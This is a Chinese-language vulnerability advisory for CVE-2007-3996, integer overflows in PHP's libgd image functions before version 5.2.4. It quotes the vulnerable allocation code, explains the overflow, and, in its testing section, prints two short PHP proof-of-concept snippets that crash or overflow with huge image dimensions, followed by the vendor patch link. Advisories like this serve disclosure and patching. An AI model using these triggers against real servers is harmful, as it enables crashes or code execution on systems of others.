发布日期：2007-08-31
更新日期：2007-09-03

受影响系统：

PHP PHP < 5.2.4

不受影响系统：

PHP PHP 5.2.4

描述：

---

CVE(CAN) ID: CVE-2007-3996

PHP是广泛使用的通用目的脚本语言，特别适合于Web开发，可嵌入到HTML中。

PHP的libgd实现中gdImageCreate()和gdImageCreateTrueColor()函数存在整数溢出漏洞，远程攻击者可能利用此漏洞控制服务器。

这两个函数可由ImageCreate()和ImageCreateTrueColor()直接调用。

...

im->tpixels = (int **) gdMalloc(sizeof(int *) * sy);
im->AA_opacity = (unsigned char **) gdMalloc(sizeof(unsigned char *) * sy);

...

for (i = 0; i < sy; i++) {
    im->tpixels[i] = (int *) gdCalloc(sx, sizeof(int));
    im->AA_opacity[i] = (unsigned char *) gdCalloc(sx, sizeof(unsigned char));
}

...

使用很大的sy/height或sx/width值就可以在为im->tpixels和im->AA_opacity分配内存时触发整数溢出，导致崩溃或执行任意代码。由于可从PHP代码的多个位置调用gdImageCreate()和gdImageCreateTrueColor()，如使用任意imagecreatefrom* -函数，因此可以通过向Web应用上传图形来远程触发溢出。

PHP的libgd实现中gdImageCopyResized()函数也存在整数溢出漏洞，该函数可由imagecopyresized()或imagecopyresampled()调用。

...

stx = (int *) gdMalloc (sizeof (int) * srcW);
sty = (int *) gdMalloc (sizeof (int) * srcH);

...

for (i = 0; (i < srcW); i++) {
    stx[i] = dstW * (i+1) / srcW - dstW * i / srcW ;
}
for (i = 0; (i < srcH); i++) {
    sty[i] = dstH * (i+1) / srcH - dstH * i / srcH ;
}

...

向srcW或srcH传送很大的值就会在分配stx和sty的缓冲区时触发整数溢出，分配操作后的for循环会试图写入大量数据，导致崩溃或执行任意代码。如果Web应用程序使用这个函数调整远程上传图形的大小，则上传特制图形文件就可以触发这个溢出。

<*来源：Mattias Bengtsson （mattias@secweb.se）
        Philip Olausson （po@secweb.se）
  
  链接：http://www.php.net/releases/5_2_4.php
        http://secweb.se/en/advisories/php-imagecopyresized-integer-overflow/
        http://secunia.com/advisories/21546/print/
        http://secweb.se/en/advisories/php-imagecreatetruecolor-integer-overflow/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?php

imagecopyresized(imagecreatetruecolor(0x7fffffff, 120),
                imagecreatetruecolor(120, 120),
                0, 0, 0, 0, 0x7fffffff, 120, 120, 120);

?>


<?php

imagecreatetruecolor(1234,1073741824);

?>

建议：

---

厂商补丁：

PHP
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.php.net/releases/5_2_4.php

浏览次数：3438
严重程度：0（网友投票）